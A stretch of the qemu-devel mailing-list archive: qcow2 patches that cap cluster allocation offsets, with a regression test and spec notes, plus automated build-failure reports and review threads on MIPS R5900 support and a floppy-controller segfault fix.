f1aba960cc: ui/gtk: fix cursor in egl mode (Gerd Hoffmann)
6cdc2d189c: pulseaudio: process audio data in smaller chunks (Gerd Hoffmann)
627c865d22: edid: silence a stringop-overflow warning (Marc-André Lureau)
c0188e69d3: bt: Mark the bluetooth subsystem as deprecated (Thomas Huth)
b4c0595446: docker: use HTTPS git URL for virglrenderer (Stefan Hajnoczi)
06bef596ce: target-alpha: use HTTPS git URL for palcode (Stefan Hajnoczi)
8308ed30a2: pc-testdev: use HTTPS git URL (Stefan Hajnoczi)
ebe2aad24e: git: use HTTPS git URLs for repo.or.cz (Stefan Hajnoczi)
a897f22b59: gitmodules: use 'https://' instead of 'git://' (Stefan Hajnoczi)
e18a8b3423: MAINTAINERS: use 'https://' instead of 'git://' for GitHub (Stefan 
Hajnoczi)
86e6010a7a: get_maintainer: use 'https://' instead of 'git://' (Stefan Hajnoczi)
c814b17762: README: use 'https://' instead of 'git://' (Stefan Hajnoczi)
5c75f3adbb: slirp: fork_exec(): create and connect child socket before fork() 
(Peter Maydell)
4ded9bb54c: slirp: Remove code that handles socreate() failure (Peter Maydell)
84ec9bfaf2: slirp: Use g_new() to allocate sockets in socreate() (Peter Maydell)
c41868152a: slirp: Don't pass possibly -1 fd to send() (Peter Maydell)
61baac2fdb: qga: Add multiple include guard to guest-agent-core.h (Peter 
Maydell)
f898ee0f99: qga-win: fix leaks of 

[Qemu-devel] [PATCH v3 2/3] qcow2: Don't allow overflow during cluster allocation

[Eric Blake]

Our code was already checking that we did not attempt to
allocate more clusters than what would fit in an INT64 (the
physical maximimum if we can access a full off_t's worth of
data).  But this does not catch smaller limits enforced by
various spots in the qcow2 image description: L1 and normal
clusters of L2 are documented as having bits 63-56 reserved
for other purposes, capping our maximum offset at 64PB (bit
55 is the maximum bit set).  And for compressed images with
2M clusters, the cap drops the maximum offset to bit 48, or
a maximum offset of 512TB.  If we overflow that offset, we
would write compressed data into one place, but try to
decompress from another, which won't work.

It's actually possible to prove that overflow can cause image
corruption without this patch; I'll add the iotests separately
in the next commit.

Signed-off-by: Eric Blake 
Reviewed-by: Alberto Garcia 

---
v8: don't artificially cap reftable allocations [Kevin]
v6: improve commit message, now that iotests is possible [Max]
v3: use s->cluster_offset_mask instead of open-coding it [Berto],
use MIN() to clamp offset on small cluster size, add spec patch
first to justify clamping even on refcount allocations
---
 block/qcow2.h  |  6 ++
 block/qcow2-refcount.c | 20 +---
 2 files changed, 19 insertions(+), 7 deletions(-)

diff --git a/block/qcow2.h b/block/qcow2.h
index 29c98d87a07..8662b685753 100644
--- a/block/qcow2.h
+++ b/block/qcow2.h
@@ -42,6 +42,12 @@
 #define QCOW_MAX_CRYPT_CLUSTERS 32
 #define QCOW_MAX_SNAPSHOTS 65536

+/* Field widths in qcow2 mean normal cluster offsets cannot reach
+ * 64PB; depending on cluster size, compressed clusters can have a
+ * smaller limit (64PB for up to 16k clusters, then ramps down to
+ * 512TB for 2M clusters).  */
+#define QCOW_MAX_CLUSTER_OFFSET ((1ULL << 56) - 1)
+
 /* 8 MB refcount table is enough for 2 PB images at 64k cluster size
  * (128 GB for 512 byte clusters, 2 EB for 2 MB clusters) */
 #define QCOW_MAX_REFTABLE_SIZE S_8MiB
diff --git a/block/qcow2-refcount.c b/block/qcow2-refcount.c
index 46082aeac1d..1c63ac244ac 100644
--- a/block/qcow2-refcount.c
+++ b/block/qcow2-refcount.c
@@ -31,7 +31,8 @@
 #include "qemu/bswap.h"
 #include "qemu/cutils.h"

-static int64_t alloc_clusters_noref(BlockDriverState *bs, uint64_t size);
+static int64_t alloc_clusters_noref(BlockDriverState *bs, uint64_t size,
+uint64_t max);
 static int QEMU_WARN_UNUSED_RESULT update_refcount(BlockDriverState *bs,
 int64_t offset, int64_t length, uint64_t addend,
 bool decrease, enum qcow2_discard_type type);
@@ -362,7 +363,7 @@ static int alloc_refcount_block(BlockDriverState *bs,
 }

 /* Allocate the refcount block itself and mark it as used */
-int64_t new_block = alloc_clusters_noref(bs, s->cluster_size);
+int64_t new_block = alloc_clusters_noref(bs, s->cluster_size, INT64_MAX);
 if (new_block < 0) {
 return new_block;
 }
@@ -954,7 +955,8 @@ int qcow2_update_cluster_refcount(BlockDriverState *bs,


 /* return < 0 if error */
-static int64_t alloc_clusters_noref(BlockDriverState *bs, uint64_t size)
+static int64_t alloc_clusters_noref(BlockDriverState *bs, uint64_t size,
+uint64_t max)
 {
 BDRVQcow2State *s = bs->opaque;
 uint64_t i, nb_clusters, refcount;
@@ -979,9 +981,9 @@ retry:
 }

 /* Make sure that all offsets in the "allocated" range are representable
- * in an int64_t */
+ * in the requested max */
 if (s->free_cluster_index > 0 &&
-s->free_cluster_index - 1 > (INT64_MAX >> s->cluster_bits))
+s->free_cluster_index - 1 > (max >> s->cluster_bits))
 {
 return -EFBIG;
 }
@@ -1001,7 +1003,7 @@ int64_t qcow2_alloc_clusters(BlockDriverState *bs, 
uint64_t size)

 BLKDBG_EVENT(bs->file, BLKDBG_CLUSTER_ALLOC);
 do {
-offset = alloc_clusters_noref(bs, size);
+offset = alloc_clusters_noref(bs, size, QCOW_MAX_CLUSTER_OFFSET);
 if (offset < 0) {
 return offset;
 }
@@ -1083,7 +1085,11 @@ int64_t qcow2_alloc_bytes(BlockDriverState *bs, int size)
 free_in_cluster = s->cluster_size - offset_into_cluster(s, offset);
 do {
 if (!offset || free_in_cluster < size) {
-int64_t new_cluster = alloc_clusters_noref(bs, s->cluster_size);
+int64_t new_cluster;
+
+new_cluster = alloc_clusters_noref(bs, s->cluster_size,
+   MIN(s->cluster_offset_mask,
+   QCOW_MAX_CLUSTER_OFFSET));
 if (new_cluster < 0) {
 return new_cluster;
 }
-- 
2.17.2

[Qemu-devel] [PATCH v3 3/3] iotests: Add new test 220 for max compressed cluster offset

[Eric Blake]

If you have a capable file system (tmpfs is good, ext4 not so much;
run ./check with TEST_DIR pointing to a good location so as not
to skip the test), it's actually possible to create a qcow2 file
that expands to a sparse 512T image with just over 38M of content.
The test is not the world's fastest (qemu crawling through 256M
bits of refcount table to find the next cluster to allocate takes
several seconds, as does qemu-img check reporting millions of
leaked clusters); but it DOES catch the problem that the previous
patch just fixed where writing a compressed cluster to a full
image ended up overwriting the wrong cluster.

Suggested-by: Max Reitz 
Signed-off-by: Eric Blake 
Reviewed-by: Alberto Garcia 

---
v8: prefer $() over ``
v7: s/214/220/
v6: new patch; took over 90 seconds to run on my setup, using tmpfs
---
 tests/qemu-iotests/220 | 96 ++
 tests/qemu-iotests/220.out | 54 +
 tests/qemu-iotests/group   |  1 +
 3 files changed, 151 insertions(+)
 create mode 100755 tests/qemu-iotests/220
 create mode 100644 tests/qemu-iotests/220.out

diff --git a/tests/qemu-iotests/220 b/tests/qemu-iotests/220
new file mode 100755
index 000..0c5682bda07
--- /dev/null
+++ b/tests/qemu-iotests/220
@@ -0,0 +1,96 @@
+#!/bin/bash
+#
+# max limits on compression in huge qcow2 files
+#
+# Copyright (C) 2018 Red Hat, Inc.
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see .
+#
+
+seq=$(basename $0)
+echo "QA output created by $seq"
+
+status=1# failure is the default!
+
+_cleanup()
+{
+_cleanup_test_img
+}
+trap "_cleanup; exit \$status" 0 1 2 3 15
+
+# get standard environment, filters and checks
+. ./common.rc
+. ./common.filter
+. ./common.pattern
+
+_supported_fmt qcow2
+_supported_proto file
+_supported_os Linux
+
+echo "== Creating huge file =="
+
+# Sanity check: We require a file system that permits the creation
+# of a HUGE (but very sparse) file.  tmpfs works, ext4 does not.
+if ! truncate --size=513T "$TEST_IMG"; then
+_notrun "file system on $TEST_DIR does not support large enough files"
+fi
+rm "$TEST_IMG"
+IMGOPTS='cluster_size=2M,refcount_bits=1' _make_test_img 513T
+
+echo "== Populating refcounts =="
+# We want an image with 256M refcounts * 2M clusters = 512T referenced.
+# Each 2M cluster holds 16M refcounts; the refcount table initially uses
+# 1 refblock, so we need to add 15 more.  The refcount table lives at 2M,
+# first refblock at 4M, L2 at 6M, so our remaining additions start at 8M.
+# Then, for each refblock, mark it as fully populated.
+to_hex() {
+printf %016x\\n $1 | sed 's/\(..\)/\\x\1/g'
+}
+truncate --size=38m "$TEST_IMG"
+entry=$((0x20))
+$QEMU_IO_PROG -f raw -c "w -P 0xff 4m 2m" "$TEST_IMG" | _filter_qemu_io
+for i in {1..15}; do
+offs=$((0x60 + i*0x20))
+poke_file "$TEST_IMG" $((i*8 + entry)) $(to_hex $offs)
+$QEMU_IO_PROG -f raw -c "w -P 0xff $offs 2m" "$TEST_IMG" | _filter_qemu_io
+done
+
+echo "== Checking file before =="
+# FIXME: 'qemu-img check' doesn't diagnose refcounts beyond the end of
+# the file as leaked clusters
+_check_test_img 2>&1 | sed '/^Leaked cluster/d'
+stat -c 'image size %s' "$TEST_IMG"
+
+echo "== Trying to write compressed cluster =="
+# Given our file size, the next available cluster at 512T lies beyond the
+# maximum offset that a compressed 2M cluster can reside in
+$QEMU_IO_PROG -c 'w -c 0 2m' "$TEST_IMG" | _filter_qemu_io
+# The attempt failed, but ended up allocating a new refblock
+stat -c 'image size %s' "$TEST_IMG"
+
+echo "== Writing normal cluster =="
+# The failed write should not corrupt the image, so a normal write succeeds
+$QEMU_IO_PROG -c 'w 0 2m' "$TEST_IMG" | _filter_qemu_io
+
+echo "== Checking file after =="
+# qemu-img now sees the millions of leaked clusters, thanks to the allocations
+# at 512T.  Undo many of our faked references to speed up the check.
+$QEMU_IO_PROG -f raw -c "w -z 5m 1m" -c "w -z 8m 30m" "$TEST_IMG" |
+_filter_qemu_io
+_check_test_img 2>&1 | sed '/^Leaked cluster/d'
+
+# success, all done
+echo "*** done"
+rm -f $seq.full
+status=0
diff --git a/tests/qemu-iotests/220.out b/tests/qemu-iotests/220.out
new file mode 100644
index 000..af3021fd883
--- /dev/null
+++ b/tests/qemu-iotests/220.out
@@ -0,0 +1,54 @@
+QA output created by 220
+== Creating huge file ==
+Formatting 'TEST_DIR/t.IMGFMT', fmt=IMGFMT 

[Qemu-devel] [PATCH v3 1/3] qcow2: Document some maximum size constraints

[Eric Blake]

Although off_t permits up to 63 bits (8EB) of file offsets, in
practice, we're going to hit other limits first.  Document some
of those limits in the qcow2 spec, and how choice of cluster size
can influence some of the limits.

While we cannot map any virtual cluster to any address higher than
64 PB (56 bits) (due to the current L1/L2 field encoding stopping
at bit 55), the refcount table can currently be sized larger.  For
comparison, ext4 with 4k blocks caps files at 16PB.

Another interesting limit: for compressed clusters, the L2 layout
requires an ever-smaller maximum host offset as cluster size gets
larger, down to a 512 TB maximum with 2M clusters.

Signed-off-by: Eric Blake 

--
v8: don't try and limit refcount (R-b dropped)
v5: even more wording tweaks
v4: more wording tweaks
v3: new patch
---
 docs/interop/qcow2.txt | 30 --
 1 file changed, 28 insertions(+), 2 deletions(-)

diff --git a/docs/interop/qcow2.txt b/docs/interop/qcow2.txt
index 845d40a086d..89faf7b99f3 100644
--- a/docs/interop/qcow2.txt
+++ b/docs/interop/qcow2.txt
@@ -40,7 +40,16 @@ The first cluster of a qcow2 image contains the file header:
 with larger cluster sizes.

  24 - 31:   size
-Virtual disk size in bytes
+Virtual disk size in bytes.
+
+Note: with a 2 MB cluster size, the maximum
+virtual size is 2 EB (61 bits) for a fully sparse
+file; however, L1/L2 table layouts limit an image
+to no more than 64 PB (56 bits) of populated
+clusters, and an image may hit other limits first
+(such as a file system's maximum size).  With a
+512 byte cluster size, the maximum virtual size
+drops to 128 GB (37 bits).

  32 - 35:   crypt_method
 0 for no encryption
@@ -326,6 +335,11 @@ in the image file.
 It contains pointers to the second level structures which are called refcount
 blocks and are exactly one cluster in size.

+Although the refcount table can reserve clusters past 64 PB (56 bits)
+(assuming the underlying protocol can even be sized that large), note
+that some qcow2 metadata such as L1/L2 tables must point to clusters
+prior to that point.
+
 Given an offset into the image file, the refcount of its cluster can be
 obtained as follows:

@@ -365,6 +379,16 @@ The L1 table has a variable size (stored in the header) 
and may use multiple
 clusters, however it must be contiguous in the image file. L2 tables are
 exactly one cluster in size.

+The L1 and L2 tables have implications on the maximum virtual file
+size; a larger cluster size is required for the guest to have access
+to more space.  Furthermore, a virtual cluster must currently map to a
+host offset below 64 PB (56 bits) (although this limit could be
+relaxed by putting reserved bits into use).  Additionally, as cluster
+size increases, the maximum host offset for a compressed cluster is
+reduced (a 2M cluster size requires compressed clusters to reside
+below 512 TB (49 bits), and this limit cannot be relaxed without an
+incompatible layout change).
+
 Given an offset into the virtual disk, the offset into the image file can be
 obtained as follows:

@@ -427,7 +451,9 @@ Standard Cluster Descriptor:
 Compressed Clusters Descriptor (x = 62 - (cluster_bits - 8)):

 Bit  0 - x-1:   Host cluster offset. This is usually _not_ aligned to a
-cluster or sector boundary!
+cluster or sector boundary!  If cluster_bits is
+small enough that this field includes bits beyond
+55, those upper bits must be set to 0.

  x - 61:Number of additional 512-byte sectors used for the
 compressed data, beyond the sector containing the offset
-- 
2.17.2

Re: [Qemu-devel] [PATCH v2 0/3] fsdev-throttle-qmp: qmp interface for fsdev io throttling

[no-reply]

Hi,

This series failed docker-mingw@fedora build test. Please find the testing 
commands and
their output below. If you have Docker installed, you can probably reproduce it
locally.

Type: series
Message-id: cover.1542110461.git.xiezh...@huawei.com
Subject: [Qemu-devel] [PATCH v2 0/3] fsdev-throttle-qmp: qmp interface for 
fsdev io throttling

=== TEST SCRIPT BEGIN ===
#!/bin/bash
time make docker-test-mingw@fedora SHOW_ENV=1 J=8
=== TEST SCRIPT END ===

Updating 3c8cf5a9c21ff8782164d1def7f44bd888713384
Switched to a new branch 'test'
fa53c78941 fsdev-throttle-qmp: hmp interface for fsdev io throttling
468c324722 fsdev-throttle-qmp: qmp interface for fsdev io throttling
e0698a59db fsdev-throttle-qmp: refactor code for qmp interface for io throttling

=== OUTPUT BEGIN ===
  BUILD   fedora
make[1]: Entering directory '/var/tmp/patchew-tester-tmp-eoac107z/src'
  GEN 
/var/tmp/patchew-tester-tmp-eoac107z/src/docker-src.2018-11-13-17.49.44.9850/qemu.tar
Cloning into 
'/var/tmp/patchew-tester-tmp-eoac107z/src/docker-src.2018-11-13-17.49.44.9850/qemu.tar.vroot'...
done.
Your branch is up-to-date with 'origin/test'.
Submodule 'dtc' (https://git.qemu.org/git/dtc.git) registered for path 'dtc'
Cloning into 
'/var/tmp/patchew-tester-tmp-eoac107z/src/docker-src.2018-11-13-17.49.44.9850/qemu.tar.vroot/dtc'...
Submodule path 'dtc': checked out '88f18909db731a627456f26d779445f84e449536'
Submodule 'ui/keycodemapdb' (https://git.qemu.org/git/keycodemapdb.git) 
registered for path 'ui/keycodemapdb'
Cloning into 
'/var/tmp/patchew-tester-tmp-eoac107z/src/docker-src.2018-11-13-17.49.44.9850/qemu.tar.vroot/ui/keycodemapdb'...
Submodule path 'ui/keycodemapdb': checked out 
'6b3d716e2b6472eb7189d3220552280ef3d832ce'
  COPYRUNNER
RUN test-mingw in qemu:fedora 
Packages installed:
SDL2-devel-2.0.8-5.fc28.x86_64
bc-1.07.1-5.fc28.x86_64
bison-3.0.4-9.fc28.x86_64
bluez-libs-devel-5.50-1.fc28.x86_64
brlapi-devel-0.6.7-19.fc28.x86_64
bzip2-1.0.6-26.fc28.x86_64
bzip2-devel-1.0.6-26.fc28.x86_64
ccache-3.4.2-2.fc28.x86_64
clang-6.0.1-1.fc28.x86_64
device-mapper-multipath-devel-0.7.4-3.git07e7bd5.fc28.x86_64
findutils-4.6.0-19.fc28.x86_64
flex-2.6.1-7.fc28.x86_64
gcc-8.1.1-5.fc28.x86_64
gcc-c++-8.1.1-5.fc28.x86_64
gettext-0.19.8.1-14.fc28.x86_64
git-2.17.1-3.fc28.x86_64
glib2-devel-2.56.1-4.fc28.x86_64
glusterfs-api-devel-4.1.2-2.fc28.x86_64
gnutls-devel-3.6.3-3.fc28.x86_64
gtk3-devel-3.22.30-1.fc28.x86_64
hostname-3.20-3.fc28.x86_64
libaio-devel-0.3.110-11.fc28.x86_64
libasan-8.1.1-5.fc28.x86_64
libattr-devel-2.4.48-3.fc28.x86_64
libcap-devel-2.25-9.fc28.x86_64
libcap-ng-devel-0.7.9-4.fc28.x86_64
libcurl-devel-7.59.0-6.fc28.x86_64
libfdt-devel-1.4.6-5.fc28.x86_64
libpng-devel-1.6.34-6.fc28.x86_64
librbd-devel-12.2.7-1.fc28.x86_64
libssh2-devel-1.8.0-7.fc28.x86_64
libubsan-8.1.1-5.fc28.x86_64
libusbx-devel-1.0.22-1.fc28.x86_64
libxml2-devel-2.9.8-4.fc28.x86_64
llvm-6.0.1-6.fc28.x86_64
lzo-devel-2.08-12.fc28.x86_64
make-4.2.1-6.fc28.x86_64
mingw32-SDL2-2.0.5-3.fc27.noarch
mingw32-bzip2-1.0.6-9.fc27.noarch
mingw32-curl-7.57.0-1.fc28.noarch
mingw32-glib2-2.56.1-1.fc28.noarch
mingw32-gmp-6.1.2-2.fc27.noarch
mingw32-gnutls-3.6.2-1.fc28.noarch
mingw32-gtk3-3.22.30-1.fc28.noarch
mingw32-libjpeg-turbo-1.5.1-3.fc27.noarch
mingw32-libpng-1.6.29-2.fc27.noarch
mingw32-libssh2-1.8.0-3.fc27.noarch
mingw32-libtasn1-4.13-1.fc28.noarch
mingw32-nettle-3.4-1.fc28.noarch
mingw32-pixman-0.34.0-3.fc27.noarch
mingw32-pkg-config-0.28-9.fc27.x86_64
mingw64-SDL2-2.0.5-3.fc27.noarch
mingw64-bzip2-1.0.6-9.fc27.noarch
mingw64-curl-7.57.0-1.fc28.noarch
mingw64-glib2-2.56.1-1.fc28.noarch
mingw64-gmp-6.1.2-2.fc27.noarch
mingw64-gnutls-3.6.2-1.fc28.noarch
mingw64-gtk3-3.22.30-1.fc28.noarch
mingw64-libjpeg-turbo-1.5.1-3.fc27.noarch
mingw64-libpng-1.6.29-2.fc27.noarch
mingw64-libssh2-1.8.0-3.fc27.noarch
mingw64-libtasn1-4.13-1.fc28.noarch
mingw64-nettle-3.4-1.fc28.noarch
mingw64-pixman-0.34.0-3.fc27.noarch
mingw64-pkg-config-0.28-9.fc27.x86_64
ncurses-devel-6.1-5.20180224.fc28.x86_64
nettle-devel-3.4-2.fc28.x86_64
nss-devel-3.38.0-1.0.fc28.x86_64
numactl-devel-2.0.11-8.fc28.x86_64
package PyYAML is not installed
package libjpeg-devel is not installed
perl-5.26.2-413.fc28.x86_64
pixman-devel-0.34.0-8.fc28.x86_64
python3-3.6.5-1.fc28.x86_64
snappy-devel-1.1.7-5.fc28.x86_64
sparse-0.5.2-1.fc28.x86_64
spice-server-devel-0.14.0-4.fc28.x86_64
systemtap-sdt-devel-3.3-1.fc28.x86_64
tar-1.30-3.fc28.x86_64
usbredir-devel-0.8.0-1.fc28.x86_64
virglrenderer-devel-0.6.0-4.20170210git76b3da97b.fc28.x86_64
vte3-devel-0.36.5-6.fc28.x86_64
which-2.21-8.fc28.x86_64
xen-devel-4.10.1-5.fc28.x86_64
zlib-devel-1.2.11-8.fc28.x86_64

Environment variables:
TARGET_LIST=
PACKAGES=bc bison bluez-libs-devel brlapi-devel bzip2 
bzip2-devel ccache clang device-mapper-multipath-devel 
findutils flex gcc gcc-c++ gettext git glib2-devel 
glusterfs-api-devel gnutls-devel gtk3-devel hostname 
libaio-devel libasan 

Re: [Qemu-devel] [PATCH] target/mips: Disable R5900 support

[Philippe Mathieu-Daudé]

On Tue, Nov 13, 2018 at 8:29 PM Philippe Mathieu-Daudé
 wrote:
> On Tue, Nov 13, 2018 at 8:08 PM Aleksandar Markovic
>  wrote:
> >
> > From: Aleksandar Markovic 
> >
> > Disable R5900 support. There are some outstanding issues related
> > to ABI support and emulation accuracy, that were not understood
> > well during review process. Disable to avoid backward compatibility
> > issues.

If the issues you mentioned are "the R5900 tcg opcodes are not
implemented correctly", then this patch is OK, because no cpu can use
the R5900 opcodes.

At some point while reading your reviews, I understood the R5900
patches introduced incorrect behaviors for the non-R5900 cpus. In this
case this patch wouldn't suffice.

> Can you add:
>
> This reverts commit ed4f49ba9bb56ebca6987b1083255daf6c89b5de.
>
> Or
>
> Fixes: ed4f49ba9
>
> when applying?

Hoping I misinterpreted your reviews, then this patch is OK.
With one of the suggested comments:
Reviewed-by: Philippe Mathieu-Daudé 

Then we will fix this for the 4.0 release.

Regards,

Phil.

> >
> > Signed-off-by: Aleksandar Markovic 
> > ---
> >  target/mips/translate_init.inc.c | 59 
> > 
> >  1 file changed, 59 deletions(-)
> >
> > diff --git a/target/mips/translate_init.inc.c 
> > b/target/mips/translate_init.inc.c
> > index 85da4a2..acab097 100644
> > --- a/target/mips/translate_init.inc.c
> > +++ b/target/mips/translate_init.inc.c
> > @@ -411,65 +411,6 @@ const mips_def_t mips_defs[] =
> >  .mmu_type = MMU_TYPE_R4000,
> >  },
> >  {
> > -/*
> > - * The Toshiba TX System RISC TX79 Core Architecture manual
> > - *
> > - * https://wiki.qemu.org/File:C790.pdf
> > - *
> > - * describes the C790 processor that is a follow-up to the R5900.
> > - * There are a few notable differences in that the R5900 FPU
> > - *
> > - * - is not IEEE 754-1985 compliant,
> > - * - does not implement double format, and
> > - * - its machine code is nonstandard.
> > - */
> > -.name = "R5900",
> > -.CP0_PRid = 0x2E00,
> > -/* No L2 cache, icache size 32k, dcache size 32k, uncached 
> > coherency. */
> > -.CP0_Config0 = (0x3 << 9) | (0x3 << 6) | (0x2 << CP0C0_K0),
> > -.CP0_Status_rw_bitmask = 0xF4C79C1F,
> > -#ifdef CONFIG_USER_ONLY
> > -/*
> > - * R5900 hardware traps to the Linux kernel for IEEE 754-1985 and 
> > LL/SC
> > - * emulation. For user only, QEMU is the kernel, so we emulate the 
> > traps
> > - * by simply emulating the instructions directly.
> > - *
> > - * Note: Config1 is only used internally, the R5900 has only 
> > Config0.
> > - */
> > -.CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU),
> > -.CP0_LLAddr_rw_bitmask = 0x,
> > -.CP0_LLAddr_shift = 4,
> > -.CP1_fcr0 = (0x38 << FCR0_PRID) | (0x0 << FCR0_REV),
> > -.CP1_fcr31 = 0,
> > -.CP1_fcr31_rw_bitmask = 0x0183,
> > -#else
> > -/*
> > - * The R5900 COP1 FPU implements single-precision floating-point
> > - * operations but is not entirely IEEE 754-1985 compatible. In
> > - * particular,
> > - *
> > - * - NaN (not a number) and +/- infinities are not supported;
> > - * - exception mechanisms are not fully supported;
> > - * - denormalized numbers are not supported;
> > - * - rounding towards nearest and +/- infinities are not supported;
> > - * - computed results usually differs in the least significant bit;
> > - * - saturations can differ more than the least significant bit.
> > - *
> > - * Since only rounding towards zero is supported, the two least
> > - * significant bits of FCR31 are hardwired to 01.
> > - *
> > - * FPU emulation is disabled here until it is implemented.
> > - *
> > - * Note: Config1 is only used internally, the R5900 has only 
> > Config0.
> > - */
> > -.CP0_Config1 = (47 << CP0C1_MMU),
> > -#endif /* !CONFIG_USER_ONLY */
> > -.SEGBITS = 32,
> > -.PABITS = 32,
> > -.insn_flags = CPU_R5900 | ASE_MMI,
> > -.mmu_type = MMU_TYPE_R4000,
> > -},
> > -{
> >  /* A generic CPU supporting MIPS32 Release 6 ISA.
> > FIXME: Support IEEE 754-2008 FP.
> >Eventually this should be replaced by a real CPU model. 
> > */
> > --
> > 2.7.4
> >
> >

Re: [Qemu-devel] [PATCH v7 6/6] qcow2: Avoid memory over-allocation on compressed images

[Eric Blake]

On 6/29/18 10:47 AM, Kevin Wolf wrote:

Am 29.06.2018 um 17:16 hat Eric Blake geschrieben:

On 06/29/2018 04:03 AM, Kevin Wolf wrote:

Am 28.06.2018 um 21:07 hat Eric Blake geschrieben:

When reading a compressed image, we were allocating s->cluster_data
to 32*cluster_size + 512 (possibly over 64 megabytes, for an image
with 2M clusters).  Let's check out the history:




However, the qcow2 spec permits an all-ones sector count, plus
a full sector containing the initial offset, for a maximum read
of 2 full clusters.  Thanks to the way decompression works, even
though such a value is too large for the actual compressed data
(for all but 512-byte clusters), it really doesn't matter if we
read too much (gzip ignores slop, once it has decoded a full
cluster).  So it's easier to just allocate cluster_data to be as
large as we can ever possibly see; even if it still wastes up to
2M on any image created by qcow2, that's still an improvment of


s/improvment/improvement/


60M less waste than pre-patch.




I wonder how much of a difference s->cluster_cache really makes. I
wouldn't expect guests to access the same cluster twice in a row.


I don't know if it makes a difference.  But my patch is not even touching
that - ALL I'm doing is changing a 64M allocation into a 4M allocation, with
otherwise no change to the frequency of allocation (which is once per
image).



Maybe the easiest solution would be switching to temporary buffers that
would have the exact size we need and would be freed at the end of the
request?


The exact size for a qemu-produced image would be at most 2M instead of 4M -
but doing the change you propose WILL cause more frequent allocations (once
per cluster, rather than once per image).  We'd have to benchmark if it
makes sense.


I wouldn't expect that another allocation makes a big difference when
you already have to decompress the whole cluster. In fact, it could
speed things up because we could then parallelise this.

Hmm... Wasn't there a series for using a worker thread for decompression
recently? It might actually already make that change, I don't remember.


But that would be a separate patch from this one.


Yes, just a thought I had while reviewing your patch.


Well, such a patch has now landed in your block-next queue, so I'm going 
to rebase this patch on top of that (if there's still anything left to 
rebase, that is), and submit the remaining parts of this series that 
still make sense for 3.1 as a v8 posting.


--
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3266
Virtualization:  qemu.org | libvirt.org

Re: [Qemu-devel] [PATCH for-3.1] fdc: fix segfault in fdctrl_stop_transfer() when DMA is disabled

[John Snow]

On 11/13/18 8:16 AM, Kevin Wolf wrote:
> Am 12.11.2018 um 20:58 hat John Snow geschrieben:
>>
>>
>> On 11/11/18 4:40 AM, Mark Cave-Ayland wrote:
>>> Commit c8a35f1cf0f "fdc: use IsaDma interface instead of global DMA_*
>>> functions" accidentally introduced a segfault in fdctrl_stop_transfer() for
>>> non-DMA transfers.
>>>
>>> If fdctrl->dma_chann has not been configured then the fdctrl->dma interface
>>> reference isn't initialised during isabus_fdc_realize(). Unfortunately
>>> fdctrl_stop_transfer() unconditionally references the DMA interface when
>>> finishing the transfer causing a NULL pointer dereference.
>>>
>>> Fix the issue by adding a check in fdctrl_stop_transfer() so that the DMA
>>> interface reference and release method is only invoked if fdctrl->dma_chann
>>> has been set.
>>>
>>> (This issue was discovered by Martin testing a recent change in the NetBSD
>>> installer under qemu-system-sparc)
>>>
>>> Reported-by: Martin Husemann 
>>> Signed-off-by: Mark Cave-Ayland 
>>> ---
>>>  hw/block/fdc.c | 2 +-
>>>  1 file changed, 1 insertion(+), 1 deletion(-)
>>>
>>> diff --git a/hw/block/fdc.c b/hw/block/fdc.c
>>> index 2e9c1e1e2f..6f19f127a5 100644
>>> --- a/hw/block/fdc.c
>>> +++ b/hw/block/fdc.c
>>> @@ -1617,7 +1617,7 @@ static void fdctrl_stop_transfer(FDCtrl *fdctrl, 
>>> uint8_t status0,
>>>  fdctrl->fifo[5] = cur_drv->sect;
>>>  fdctrl->fifo[6] = FD_SECTOR_SC;
>>>  fdctrl->data_dir = FD_DIR_READ;
>>> -if (!(fdctrl->msr & FD_MSR_NONDMA)) {
>>> +if (fdctrl->dma_chann != -1 && !(fdctrl->msr & FD_MSR_NONDMA)) {
>>>  IsaDmaClass *k = ISADMA_GET_CLASS(fdctrl->dma);
>>>  k->release_DREQ(fdctrl->dma, fdctrl->dma_chann);
>>>  }
>>>
>>
>> Thanks.
>>
>> Reviewed-by: John Snow 
>>
>> ... Kevin, would you mind staging this one-off for the next RC?
> 
> No problem, I'm applying this to my block branch. However, my pull
> request for -rc1 is already merged, so this will have to wait until next
> week and -rc2.
> 
> Kevin
> 

I think that should be fine. Thank you!

Re: [Qemu-devel] [PATCH v5 00/14] arm: nRF51 Devices and Microbit Support

[no-reply]

Hi,

This series failed docker-quick@centos7 build test. Please find the testing 
commands and
their output below. If you have Docker installed, you can probably reproduce it
locally.

Type: series
Message-id: 20181112214224.31560-1-cont...@steffen-goertz.de
Subject: [Qemu-devel] [PATCH v5 00/14] arm: nRF51 Devices and Microbit Support

=== TEST SCRIPT BEGIN ===
#!/bin/bash
time make docker-test-quick@centos7 SHOW_ENV=1 J=8
=== TEST SCRIPT END ===

Updating 3c8cf5a9c21ff8782164d1def7f44bd888713384
Switched to a new branch 'test'
187f1fc84c arm: Add Clock peripheral stub to NRF51 SOC
46c8bafa10 tests/microbit-test: Add Tests for nRF51 Timer
4a8e69516c arm: Instantiate NRF51 Timers
48bafc25c5 hw/timer/nrf51_timer: Add nRF51 Timer peripheral
300ab01b3e tests/microbit-test: Add Tests for nRF51 GPIO
2d8d566dda arm: Instantiate NRF51 general purpose I/O
b5e2ea643d hw/gpio/nrf51_gpio: Add nRF51 GPIO peripheral
76a11e0531 tests: Add bbc:microbit / nRF51 test suite
00b8265b8b arm: Instantiate NRF51 special NVM's and NVMC
faacca4fcb hw/nvram/nrf51_nvm: Add nRF51 non-volatile memories
3619b14640 arm: Instantiate NRF51 random number generator
ca058f1721 hw/misc/nrf51_rng: Add NRF51 random number generator peripheral
bfbb2b5de5 arm: Add header to host common definition for nRF51 SOC peripherals
8e46d5f624 qtest: Add set_irq_in command to set IRQ/GPIO level

=== OUTPUT BEGIN ===
  BUILD   centos7
make[1]: Entering directory '/var/tmp/patchew-tester-tmp-9fm5emqg/src'
  GEN 
/var/tmp/patchew-tester-tmp-9fm5emqg/src/docker-src.2018-11-13-14.45.50.17193/qemu.tar
Cloning into 
